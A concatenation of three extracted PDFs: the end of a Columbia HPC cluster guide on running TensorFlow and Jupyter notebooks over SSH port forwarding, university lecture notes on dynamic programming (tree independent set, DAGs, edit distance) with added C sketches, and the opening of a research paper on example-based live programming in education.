I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcudnn.so.5 locally
I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcufft.so.8.0 locally
I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcuda.so.1 locally
I tensorflow/stream_executor/dso_loader.cc:135] successfully opened CUDA library libcurand.so.8.0 locally
>>> hello = tf.constant('Hello, TensorFlow!')
>>> sess = tf.Session()
name: Tesla K80
major: 3 minor: 7 memoryClockRate (GHz) 0.8235
pciBusID 0000:83:00.0
Total memory: 11.20GiB
Free memory: 11.13GiB
I tensorflow/core/common_runtime/gpu/gpu_device.cc:906] DMA: 0
I tensorflow/core/common_runtime/gpu/gpu_device.cc:916] 0:   Y
I tensorflow/core/common_runtime/gpu/gpu_device.cc:975] Creating TensorFlow device (/gpu:0) -> (device: 0, name: Tesla K80, pci bus id: 0000:83:00.0)
>>> print(sess.run(hello))
Hello, TensorFlow!
```

**Jupyter Notebooks**

This is one way to set up and run a Jupyter notebook on Habanero. As your notebook will listen on a port that will be accessible to anyone logged in on a submit node, you should first create a password.

Creating a Password

The following steps can be run on the submit node or in an interactive job.

1. Load the anaconda python module.

```
$ module load anaconda
```

2. If you haven't already done so, initialize your jupyter environment.

```
$ jupyter notebook --generate-config
```

3. Start a python or ipython session.

```
$ ipython
```

4. Run the password hash generator. You will be prompted for a password, prompted again to verify, and then a hash of that password will be displayed.

```
In [1]: from notebook.auth import passwd; passwd()
Enter password:
Verify password:
Out[1]: 'sha1:60bdb1:306fe0101ca73be2429edbab0935c545'
```

5. Cut and paste the hash into ~/.jupyter/jupyter_notebook_config.py (important: the following line in the file is commented out by default, so please uncomment it first).

```
c.NotebookApp.password = 'sha1:60bdb1:306fe0101ca73be2429edbab0935c545'
```

Setting the password will prevent other users from having access to your notebook and potentially causing confusion.

Running a Jupyter Notebook

1. Log in to the submit node. Start an interactive job.

```
$ srun --pty -t 0-01:00 -A <ACCOUNT> /bin/bash
```

2. Get rid of the XDG_RUNTIME_DIR environment variable.

```
$ unset XDG_RUNTIME_DIR
```

3. Load the anaconda environment module.

```
$ module load anaconda
```

4. Look up the IP of the node your interactive job is running on.

```
$ hostname -i
10.43.4.206
```

5. Start the jupyter notebook, specifying the node IP.
```
$ jupyter notebook --no-browser --ip=10.43.4.206
```

6. Look for the following line in the startup output to get the port number.

```
The Jupyter Notebook is running at: http://10.43.4.206:8888/
```

7. From your local system, open a second connection to Habanero that forwards a local port to the remote node and port. Replace UNI below with your uni.

```
$ ssh -L 8080:10.43.4.206:8888 UNI@habanero.rcs.columbia.edu
```

8. Open a browser session on your desktop and enter the URL 'localhost:8080' (i.e. the string within the single quotes) into its search field. You should now see the notebook.
{"Source-Url": "https://confluence.columbia.edu/confluence/download/temp/pdfexport-20180124-240118-0936-4993/rcs-Habanero-JobExamples-240118-0936-4994.pdf?contentType=application/pdf", "len_cl100k_base": 4881, "olmocr-version": "0.1.50", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 24065, "total-output-tokens": 5897, "length": "2e12", "weborganizer": {"__label__adult": 0.0002651214599609375, "__label__art_design": 0.00033020973205566406, "__label__crime_law": 0.00017762184143066406, "__label__education_jobs": 0.00107574462890625, "__label__entertainment": 0.00013887882232666016, "__label__fashion_beauty": 9.769201278686523e-05, "__label__finance_business": 0.0001767873764038086, "__label__food_dining": 0.0002510547637939453, "__label__games": 0.0007448196411132812, "__label__hardware": 0.00215911865234375, "__label__health": 0.00018894672393798828, "__label__history": 0.00019729137420654297, "__label__home_hobbies": 9.846687316894533e-05, "__label__industrial": 0.0004544258117675781, "__label__literature": 0.0001779794692993164, "__label__politics": 0.000152587890625, "__label__religion": 0.0004181861877441406, "__label__science_tech": 0.036346435546875, "__label__social_life": 0.00014257431030273438, "__label__software": 0.05413818359375, "__label__software_dev": 0.90185546875, "__label__sports_fitness": 0.00019419193267822263, "__label__transportation": 0.00027561187744140625, "__label__travel": 0.00016176700592041016}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 18255, 0.02577]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 18255, 0.34388]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 18255, 0.74971]], "google_gemma-3-12b-it_contains_pii": [[0, 1763, false], [1763, 3382, null], [3382, 4945, null], [4945, 6313, null], [6313, 7297, null], [7297, 7934, null], [7934, 9316, null], [9316, 10943, null], [10943, 12574, null], [12574, 13440, null], [13440, 14524, null], [14524, 16160, null], [16160, 17433, null], [17433, 18255, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1763, true], [1763, 3382, null], [3382, 4945, null], [4945, 6313, null], [6313, 7297, null], [7297, 7934, null], [7934, 9316, null], [9316, 10943, null], [10943, 12574, null], [12574, 13440, null], [13440, 14524, null], [14524, 16160, null], [16160, 17433, null], [17433, 18255, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 18255, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 18255, null]], "pdf_page_numbers": [[0, 1763, 1], [1763, 3382, 2], [3382, 4945, 3], [4945, 6313, 4], [6313, 7297, 5], [7297, 7934, 6], [7934, 9316, 7], [9316, 10943, 8], [10943, 12574, 9], [12574, 13440, 
10], [13440, 14524, 11], [14524, 16160, 12], [16160, 17433, 13], [17433, 18255, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 18255, 0.00257]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
c108beb275fb0281b00bd59c704529907edddc9a
Chapter 10 More Dynamic Programming OLD CS 473: Fundamental Algorithms, Spring 2015 February 19, 2015 10.1 Maximum Weighted Independent Set in Trees 10.1.0.1 Maximum Weight Independent Set Problem Input Graph \( G = (V, E) \) and weights \( w(v) \geq 0 \) for each \( v \in V \) Goal Find maximum weight independent set in \( G \) Maximum weight independent set in above graph: \( \{B, D\} \) 10.1.0.2 Maximum Weight Independent Set in a Tree Input Tree \( T = (V, E) \) and weights \( w(v) \geq 0 \) for each \( v \in V \) Goal Find maximum weight independent set in \( T \) Maximum weight independent set in above tree: ?? 10.1.0.3 Towards a Recursive Solution (A) For an arbitrary graph \( G \): (A) Number vertices as \( v_1, v_2, \ldots, v_n \) (B) Find recursively optimum solutions without \( v_n \) (recurse on \( G - v_n \)) and with \( v_n \) (recurse on \( G - v_n - N(v_n) \) & include \( v_n \)). (C) Saw that if graph $G$ is arbitrary there was no good ordering that resulted in a small number of subproblems. (B) What about a tree? (C) Natural candidate for $v_n$ is root $r$ of $T$? 10.1.0.4 Towards a Recursive Solution (A) Natural candidate for $v_n$ is root $r$ of $T$? (B) Let $O$ be an optimum solution to the whole problem. Case $r \not\in O$ : Then $O$ contains an optimum solution for each subtree of $T$ hanging at a child of $r$. Case $r \in O$ : None of the children of $r$ can be in $O$. $O - \{r\}$ contains an optimum solution for each subtree of $T$ hanging at a grandchild of $r$. (C) Subproblems? (D) Subtrees of $T$ hanging at nodes in $T$. 10.1.0.5 A Recursive Solution (A) $T(u)$: subtree of $T$ hanging at node $u$. (B) $OPT(u)$: max weighted independent set value in $T(u)$. (C) $OPT(u) = \max \left\{ \sum_{v \text{ child of } u} OPT(v), \ w(u) + \sum_{v \text{ grandchild of } u} OPT(v) \right\}$ 10.1.0.6 Iterative Algorithm (A) Compute $OPT(u)$ bottom up. To evaluate $OPT(u)$ need to have computed values of all children and grandchildren of $u$ (B) What is an ordering of nodes of a tree $T$ to achieve above? (C) Post-order traversal of a tree. 10.1.0.7 Iterative Algorithm (A) Code: MIS-Tree($T$): Let $v_1, v_2, \ldots, v_n$ be a post-order traversal of nodes of $T$ for $i = 1$ to $n$ do \[ M[v_i] = \max \left( \sum_{v_j \text{ child of } v_i} M[v_j], \ w(v_i) + \sum_{v_j \text{ grandchild of } v_i} M[v_j] \right) \] return $M[v_n]$ (* Note: $v_n$ is the root of $T$ *) (B) **Space:** $O(n)$ to store the value at each node of $T$. (C) **Running time:** (A) Naive bound: $O(n^2)$ since each $M[v_i]$ evaluation may take $O(n)$ time and there are $n$ evaluations. (B) Better bound: $O(n)$. A value $M[v_j]$ is accessed only by its parent and grand parent. 10.1.0.8 Example 10.1.0.9 Dominating set **Definition 10.1.1.** $G = (V, E)$. The set $X \subseteq V$ is a dominating set, if any vertex $v \in V$ is either in $X$ or is adjacent to a vertex in $X$. **Problem 10.1.2.** Given weights on vertices, compute the minimum weight dominating set in $G$. **Dominating Set** is NP-Hard! 10.2 DAGs and Dynamic Programming 10.2.0.10 Recursion and DAGs **Observation 10.2.1.** Let $A$ be a recursive algorithm for problem $\Pi$. For each instance $I$ of $\Pi$ there is an associated DAG $G(I)$. (A) Create directed graph $G(I)$ as follows... (B) For each sub-problem in the execution of $A$ on $I$ create a node. (C) If sub-problem $v$ depends on or recursively calls sub-problem $u$ add directed edge $(u, v)$ to graph. (D) $G(I)$ is a DAG. Why? If $G(I)$ has a cycle then $A$ will not terminate on $I$. 
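Looking back at the MIS-Tree algorithm of Section 10.1.0.7, here is a hedged C sketch (not part of the original notes). The parent-array tree representation, the small test tree, and the naive scans used to find children and grandchildren are assumptions made for brevity; the recursion performs the post-order evaluation implicitly, and replacing the scans with explicit child lists recovers the O(n) bound discussed above.

```c
/* Maximum weight independent set in a rooted tree (MIS-Tree sketch). */
#include <stdio.h>

#define MAXN 100

int n;                 /* number of nodes              */
int parent[MAXN];      /* parent[v]; -1 for the root   */
double w[MAXN];        /* vertex weights               */
double M[MAXN];        /* M[v] = OPT(v)                */

/* Post-order evaluation of
 *   OPT(u) = max( sum over children c of OPT(c),
 *                 w(u) + sum over grandchildren g of OPT(g) ).
 */
double mis(int u)
{
    double skip_u = 0.0;   /* best value if u is excluded */
    double take_u = w[u];  /* best value if u is included */

    for (int c = 0; c < n; c++) {
        if (parent[c] != u) continue;        /* c is a child of u       */
        skip_u += mis(c);                    /* recursion fills M[.]    */
        for (int g = 0; g < n; g++)
            if (parent[g] == c)              /* g is a grandchild of u  */
                take_u += M[g];              /* already computed above  */
    }
    M[u] = (take_u > skip_u) ? take_u : skip_u;
    return M[u];
}

int main(void)
{
    /* Hypothetical instance: root 0 with children 1 and 2; node 3 is a
     * heavy child of node 1.  The optimum is {2, 3} with value 14.     */
    n = 4;
    parent[0] = -1; parent[1] = 0; parent[2] = 0; parent[3] = 1;
    w[0] = 3; w[1] = 2; w[2] = 4; w[3] = 10;

    printf("max weight independent set value = %g\n", mis(0));
    return 0;
}
```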
10.2.1 Iterative Algorithm for... 10.2.1.1 Dynamic Programming and DAGs **Observation 10.2.2.** An iterative algorithm $B$ obtained from a recursive algorithm $A$ for a problem $\Pi$ does the following: *For each instance $I$ of $\Pi$, it computes a topological sort of $G(I)$ and evaluates sub-problems according to the topological ordering.* (A) Sometimes the DAG $G(I)$ can be obtained directly without thinking about the recursive algorithm $A$ (B) In some cases (*not all*) the computation of an optimal solution reduces to a shortest/longest path in DAG $G(I)$ (C) Topological sort based shortest/longest path computation is dynamic programming! 10.2.2 A quick reminder... 10.2.2.1 A Recursive Algorithm for weighted interval scheduling Let $O_i$ be value of an optimal schedule for the first $i$ jobs. ``` Schedule(n): if $n = 0$ then return 0 if $n = 1$ then return $w(v_1)$ $O_{p(n)} \leftarrow \text{Schedule}(p(n))$ $O_{n-1} \leftarrow \text{Schedule}(n - 1)$ if $(O_{p(n)} + w(v_n) < O_{n-1})$ then $O_n = O_{n-1}$ else $O_n = O_{p(n)} + w(v_n)$ return $O_n$ ``` 10.2.3 Weighted Interval Scheduling via... 10.2.3.1 Longest Path in a DAG Given intervals, create a DAG as follows: (A) Create one node for each interval, plus a dummy sink node 0 for interval 0, plus a dummy source node $s$. (B) For each interval \( i \) add edge \((i, p(i))\) of the length/weight of \( v_i \). (C) Add an edge from \( s \) to \( n \) of length 0. (D) For each interval \( i \) add edge \((i, i - 1)\) of length 0. 10.2.3.2 Example \[ \begin{array}{cccc} 30 & 70 & 3 & 80 \\ 1 & 4 & 2 & 5 \end{array} \] \( p(5) = 2,\ p(4) = 1,\ p(3) = 1,\ p(2) = 0,\ p(1) = 0 \) 10.2.3.3 Relating Optimum Solution (A) Given interval problem instance \( I \) let \( G(I) \) denote the DAG constructed as described. (B) We have... \textbf{Claim 10.2.3.} Optimum solution to weighted interval scheduling instance \( I \) is given by longest path from \( s \) to 0 in \( G(I) \). (C) Assuming claim is true, (A) If \( I \) has \( n \) intervals, \( \text{DAG} \ G(I) \) has \( n + 2 \) nodes and \( O(n) \) edges. Creating \( G(I) \) takes \( O(n \log n) \) time: to find \( p(i) \) for each \( i \). How? (B) Longest path can be computed in \( O(n) \) time — recall \( O(m + n) \) algorithm for shortest/longest paths in DAGs. 10.2.3.4 DAG for Longest Increasing Sequence Given sequence \( a_1, a_2, \ldots, a_n \) create \( \text{DAG} \) as follows: (A) add sentinel \( a_0 \) to sequence where \( a_0 \) is less than smallest element in sequence (B) for each \( i \) there is a node \( v_i \) (C) if \( i < j \) and \( a_i < a_j \) add an edge \((v_i, v_j)\) (D) find longest path from \( v_0 \) 10.3 Edit Distance and Sequence Alignment 10.3.0.5 Spell Checking Problem (A) Given a string “exponent” that is not in the dictionary, how should a spell checker suggest a nearby string? (B) What does nearness mean? (C) Question: Given two strings $x_1x_2\ldots x_n$ and $y_1y_2\ldots y_m$ what is a distance between them? (D) Edit Distance: minimum number of “edits” to transform $x$ into $y$. 10.3.0.6 Edit Distance **Definition 10.3.1.** Edit distance between two words $X$ and $Y$ is the number of letter insertions, letter deletions and letter substitutions required to obtain $Y$ from $X$. 
**Example 10.3.2.** The edit distance between FOOD and MONEY is at most 4: $\underline{\text{FOOD}} \rightarrow \underline{\text{MOOD}} \rightarrow \underline{\text{MONOD}} \rightarrow \underline{\text{MONED}} \rightarrow \text{MONEY}$ 10.3.0.7 Edit Distance: Alternate View Alignment Place words one on top of the other, with gaps in the first word indicating insertions, and gaps in the second word indicating deletions. ``` F O O D M O N E Y ``` Formally, an alignment is a set $M$ of pairs $(i, j)$ such that each index appears at most once, and there is no “crossing”: $i < i'$ and $i$ is matched to $j$ implies $i'$ is matched to $j' > j$. In the above example, this is $M = \{(1, 1), (2, 2), (3, 3), (4, 5)\}$. Cost of an alignment is the number of mismatched columns plus number of unmatched indices in both strings. 10.3.0.8 Edit Distance Problem Problem Given two words, find the edit distance between them, i.e., an alignment of smallest cost. 10.3.0.9 Applications (A) Spell-checkers and Dictionaries (B) Unix diff (C) DNA sequence alignment ... but, we need a new metric 10.3.0.10 Similarity Metric Definition 10.3.3. For two strings $X$ and $Y$, the cost of alignment $M$ is (A) [Gap penalty] For each gap in the alignment, we incur a cost $\delta$. (B) [Mismatch cost] For each pair $p$ and $q$ that have been matched in $M$, we incur cost $\alpha_{pq}$; typically $\alpha_{pp} = 0$. Edit distance is special case when $\delta = \alpha_{pq} = 1$. 10.3.0.11 An Example Example 10.3.4. <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> <td>e</td> </tr> </tbody> </table> Cost = $\delta + \alpha_{ae}$ Alternative: <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> <td>e</td> </tr> </tbody> </table> Cost = $3\delta$ Or a really stupid solution (delete string, insert other string): <table> <thead> <tr> <th></th> <th>o</th> <th>c</th> <th>u</th> <th>r</th> <th>r</th> <th>a</th> <th>n</th> <th>c</th> <th>e</th> </tr> </thead> <tbody> <tr> <td></td> <td>o</td> <td>c</td> <td>c</td> <td>u</td> <td>r</td> <td>r</td> <td>e</td> <td>n</td> <td>c</td> </tr> </tbody> </table> Cost = $19\delta$. 10.3.0.12 Sequence Alignment **Input** Given two words $X$ and $Y$, and gap penalty $\delta$ and mismatch costs $\alpha_{pq}$ **Goal** Find alignment of minimum cost 10.3.1 Edit distance 10.3.1.1 Basic observation (A) Let \( X = \alpha x \) and \( Y = \beta y \). (B) \( \alpha, \beta \): strings. \( x \) and \( y \) single characters. (C) Optimal edit distance between \( X \) and \( Y \) as alignment. Consider last column of alignment of the two strings: \[ \begin{array}{ccc} \alpha & x \\ \beta & y \\ \end{array} \] or \[ \begin{array}{ccc} \alpha & x \\ \beta y & \\ \end{array} \] or \[ \begin{array}{ccc} \alpha x \\ \beta & y \\ \end{array} \] Observation 10.3.5. PREFIXES MUST HAVE OPTIMAL ALIGNMENT! 10.3.1.2 Problem Structure Observation 10.3.6. Let \( X = x_1x_2\cdots x_m \) and \( Y = y_1y_2\cdots y_n \). If \((m, n)\) are not matched then either the \(m\)th position of \( X \) remains unmatched or the \(n\)th position of \( Y \) remains unmatched. 
(A) Case \( x_m \) and \( y_n \) are matched. (A) Pay mismatch cost \( \alpha_{x_m y_n} \) plus cost of aligning strings \( x_1\cdots x_{m-1} \) and \( y_1\cdots y_{n-1} \) (B) Case \( x_m \) is unmatched. (A) Pay gap penalty plus cost of aligning \( x_1\cdots x_{m-1} \) and \( y_1\cdots y_n \) (C) Case \( y_n \) is unmatched. (A) Pay gap penalty plus cost of aligning \( x_1\cdots x_m \) and \( y_1\cdots y_{n-1} \) 10.3.1.3 Subproblems and Recurrence Optimal Costs Let \( \text{Opt}(i, j) \) be optimal cost of aligning \( x_1\cdots x_i \) and \( y_1\cdots y_j \). Then \[ \text{Opt}(i, j) = \min \begin{cases} \alpha_{x_i y_j} + \text{Opt}(i - 1, j - 1), \\ \delta + \text{Opt}(i - 1, j), \\ \delta + \text{Opt}(i, j - 1) \end{cases} \] Base Cases: \( \text{Opt}(i, 0) = \delta \cdot i \) and \( \text{Opt}(0, j) = \delta \cdot j \) 10.3.1.4 Dynamic Programming Solution \[ \begin{align*} \text{for all } i & \text{ do } M[i, 0] = i\delta \\ \text{for all } j & \text{ do } M[0, j] = j\delta \\ \text{for } i = 1 \text{ to } m & \text{ do } \\ & \text{ for } j = 1 \text{ to } n \text{ do } \\ & \quad M[i, j] = \min \begin{cases} \alpha_{x_i y_j} + M[i - 1, j - 1], \\ \delta + M[i - 1, j], \\ \delta + M[i, j - 1] \end{cases} \end{align*} \] Analysis Figure 10.1: Iterative algorithm in previous slide computes values in row order. Optimal value is a shortest path from \((0,0)\) to \((m,n)\) in DAG. (A) Running time is \(O(mn)\). (B) Space used is \(O(mn)\). ### 10.3.1.5 Matrix and DAG of Computation ### 10.3.1.6 Sequence Alignment in Practice (A) Typically the DNA sequences that are aligned are about \(10^5\) letters long! (B) So about \(10^{10}\) operations and \(10^{10}\) bytes needed (C) The killer is the 10GB storage (D) Can we reduce space requirements? ### 10.3.1.7 Optimizing Space (A) Recall \[ M(i,j) = \min \begin{cases} \alpha_{x_iy_j} + M(i-1,j-1), \\ \delta + M(i-1,j), \\ \delta + M(i,j-1) \end{cases} \] (B) Entries in \(j\)th column only depend on \((j-1)\)st column and earlier entries in \(j\)th column (C) Only store the current column and the previous column reusing space; \(N(i,0)\) stores \(M(i,j-1)\) and \(N(i,1)\) stores \(M(i,j)\) 10.3.1.8 Computing in column order to save space 10.3.1.9 Space Efficient Algorithm ```plaintext for all i do \( N[i, 0] = i \delta \) for \( j = 1 \) to \( n \) do \( N[0, 1] = j \delta \) (* corresponds to \( M(0, j) \) *) for \( i = 1 \) to \( m \) do \( N[i, 1] = \min \left\{ \alpha_{x_i y_j} + N[i-1, 0], \delta + N[i-1, 1], \delta + N[i, 0] \right\} \) for \( i = 1 \) to \( m \) do Copy \( N[i, 0] = N[i, 1] \) ``` Analysis Running time is \( O(mn) \) and space used is \( O(2m) = O(m) \) 10.3.1.10 Analyzing Space Efficiency (A) From the \( m \times n \) matrix \( M \) we can construct the actual alignment (exercise) (B) Matrix \( N \) computes cost of optimal alignment but no way to construct the actual alignment (C) Space efficient computation of alignment? More complicated algorithm — see textbook. 10.3.1.11 Takeaway Points (A) Dynamic programming is based on finding a recursive way to solve the problem. Need a recursion that generates a small number of subproblems. (B) Given a recursive algorithm there is a natural DAG associated with the subproblems that are generated for given instance; this is the dependency graph. An iterative algorithm simply evaluates the subproblems in some topological sort of this DAG. 
(C) The space required to evaluate the answer can be reduced in some cases by a careful examination of the dependency DAG of the subproblems, keeping only a subset of the DAG in memory at any time.
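To make the recurrence of Section 10.3.1.3 concrete, the following is a hedged C sketch of the O(mn) table-filling algorithm from Section 10.3.1.4, specialized to plain edit distance (gap penalty and mismatch cost both 1, matches free). The fixed MAXLEN bound and the FOOD/MONEY test case are illustrative assumptions; the O(m)-space variant of Section 10.3.1.9 is omitted.

```c
/* Edit distance via dynamic programming, unit costs. */
#include <stdio.h>
#include <string.h>

#define MAXLEN 100

int edit_distance(const char *x, const char *y)
{
    int m = (int)strlen(x), n = (int)strlen(y);
    int M[MAXLEN + 1][MAXLEN + 1];

    /* Base cases: aligning a prefix against the empty string. */
    for (int i = 0; i <= m; i++) M[i][0] = i;
    for (int j = 0; j <= n; j++) M[0][j] = j;

    for (int i = 1; i <= m; i++) {
        for (int j = 1; j <= n; j++) {
            int match = M[i - 1][j - 1] + (x[i - 1] == y[j - 1] ? 0 : 1);
            int gap_x = M[i - 1][j] + 1;   /* x_i left unmatched */
            int gap_y = M[i][j - 1] + 1;   /* y_j left unmatched */
            int best = match;
            if (gap_x < best) best = gap_x;
            if (gap_y < best) best = gap_y;
            M[i][j] = best;
        }
    }
    return M[m][n];
}

int main(void)
{
    /* The example from the notes: FOOD can be turned into MONEY
     * with at most 4 edits.                                      */
    printf("edit distance FOOD -> MONEY = %d\n",
           edit_distance("FOOD", "MONEY"));
    return 0;
}
```

Running it prints 4, matching Example 10.3.2.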
{"Source-Url": "https://courses.engr.illinois.edu/cs473/sp2015/w/lec/10_notes.pdf", "len_cl100k_base": 4834, "olmocr-version": "0.1.48", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 34431, "total-output-tokens": 5552, "length": "2e12", "weborganizer": {"__label__adult": 0.0003719329833984375, "__label__art_design": 0.0005388259887695312, "__label__crime_law": 0.0005755424499511719, "__label__education_jobs": 0.00814056396484375, "__label__entertainment": 0.0001252889633178711, "__label__fashion_beauty": 0.00023353099822998047, "__label__finance_business": 0.0005393028259277344, "__label__food_dining": 0.0005178451538085938, "__label__games": 0.0009560585021972656, "__label__hardware": 0.0015087127685546875, "__label__health": 0.0008306503295898438, "__label__history": 0.0005588531494140625, "__label__home_hobbies": 0.00027680397033691406, "__label__industrial": 0.0008559226989746094, "__label__literature": 0.0005211830139160156, "__label__politics": 0.00035381317138671875, "__label__religion": 0.0005555152893066406, "__label__science_tech": 0.212890625, "__label__social_life": 0.0001906156539916992, "__label__software": 0.01311492919921875, "__label__software_dev": 0.7548828125, "__label__sports_fitness": 0.0004620552062988281, "__label__transportation": 0.0008616447448730469, "__label__travel": 0.0002875328063964844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 13683, 0.04294]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 13683, 0.32145]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 13683, 0.72596]], "google_gemma-3-12b-it_contains_pii": [[0, 939, false], [939, 2170, null], [2170, 3291, null], [3291, 4961, null], [4961, 6344, null], [6344, 7777, null], [7777, 9188, null], [9188, 11280, null], [11280, 12205, null], [12205, 13650, null], [13650, 13671, null], [13671, 13671, null], [13671, 13683, null]], "google_gemma-3-12b-it_is_public_document": [[0, 939, true], [939, 2170, null], [2170, 3291, null], [3291, 4961, null], [4961, 6344, null], [6344, 7777, null], [7777, 9188, null], [9188, 11280, null], [11280, 12205, null], [12205, 13650, null], [13650, 13671, null], [13671, 13671, null], [13671, 13683, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 13683, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 13683, null]], "pdf_page_numbers": [[0, 939, 1], [939, 2170, 2], [2170, 3291, 3], [3291, 4961, 4], [4961, 6344, 5], [6344, 7777, 6], [7777, 9188, 7], [9188, 11280, 8], [11280, 12205, 9], [12205, 13650, 10], [13650, 13671, 11], [13671, 13671, 12], [13671, 13683, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 13683, 
0.03475]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
087c8d8a32dfdc77fcbdb982b1346e593b9334f7
Toward Studying Example-Based Live Programming in CS/SE Education Eva Krebs eva.krebs@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Toni Mattis toni.mattis@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Patrick Rein patrick.rein@hpi.uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Robert Hirschfeld robert.hirschfeld@uni-potsdam.de Hasso Plattner Institute Potsdam, Germany Abstract Source code is inherently abstract. While this is necessary to capture the generality of a program, it poses a barrier to understanding and learning to use the underlying concepts. In education, especially in abstract subjects like maths, the use of concrete examples is considered instrumental to the acquisition of knowledge and a frequently explored direction for teaching computational concepts. Besides concreteness, the importance of examples being close to their abstract descriptions as well as the immediacy of feedback has been highlighted. Babylonian Programming (BP) is a type of example-based live programming that fulfills all three criteria by introducing concrete values, moving them as close as possible to the code, and updating them immediately in response to changes of either the example or the code. This makes BP a promising tool in education, yet no studies on the suitability of BP in a learning context have been conducted. Hence, we propose to (1.) investigate usability of state-of-the-art BP to minimize the friction of introducing BP in education, and (2.) measure the learning effectiveness and quality of experience of a BP environment in undergraduate software engineering education. For these studies, we will use the Smalltalk-based Babylonian/S as our environment. Besides clearer guidelines on the design of BP and example-based systems in general, we expect to shed light on the qualities that teacher-provided examples need to exhibit and the opportunities for learners to create their own examples during experimentation with unknown concepts. Keywords: live programming, exploratory programming, example-based programming, babylonian programming, examples, squeak, smalltalk, education ACM Reference Format: 1 Introduction The abstract nature of source code poses a challenge to teaching programming and computational concepts. Fortunately, abstract concepts can be conveyed effectively by the use of examples, as the use of worked examples in both math and CS education demonstrates. Most examples in programming education either have the goal to illustrate the workings of an algorithm or program using concrete values (code tracing examples) or demonstrate how a program is supposed to be constructed (code generation examples) [7]. In practice, both learning objectives are interwoven: understanding the parts of a larger program (e.g., the standard library) by seeing them operate on concrete values can help learners form sub-goals that help them solve new tasks requiring code generation. Muldner et al. [7] identified the problem of making examples available and semantically close enough to the learners’ task as a major open research direction. There is also little research in how to effectively empower students to self-explain and experiment with code and computational concepts themselves. 
Moreover, the focus of the majority of previous studies is on relatively self-contained algorithmic examples that provide excellent opportunities to make use of rich visualizations due to their small scope, but such approaches do not generalize to advanced topics, such as teaching design patterns or complex libraries. What is known, however, is that the effectiveness of examples is highly influenced by their proximity to the abstract concept they illustrate: Examples that are separated from what they illustrate are less effective. This is known as the *split-attention effect* [3]. While the ideal situation of simultaneously presenting an example for an abstract concept can only be achieved by using sensorially different channels (e.g., listening to instructions while seeing a concrete example unfold), using the same medium, such as the computer screen, can likely benefit from bringing abstract and concrete elements closer together in *space* - e.g., demonstrating the effect of a line of code next to it - and in *time* - e.g., having up-to-date examples available immediately. A third dimension, *semantic proximity*, can play an important role if the goal is to understand a concept well enough to re-use it. Examples with a large semantic distance are not perceived as applicable to a problem (however, an exact semantic match invites copying and does not contribute much to a learning outcome). For instance, demonstrating a sorting algorithm with numbers helps understand the algorithm itself, but not necessary how it can be used to sort composite data. ### 1.1 From Textbooks to Live Examples Understanding source code involves mental simulation. Especially when learners lack sufficient experience to quickly recognize plans, fine-grained mental simulation can take most of the effort to understand a program - 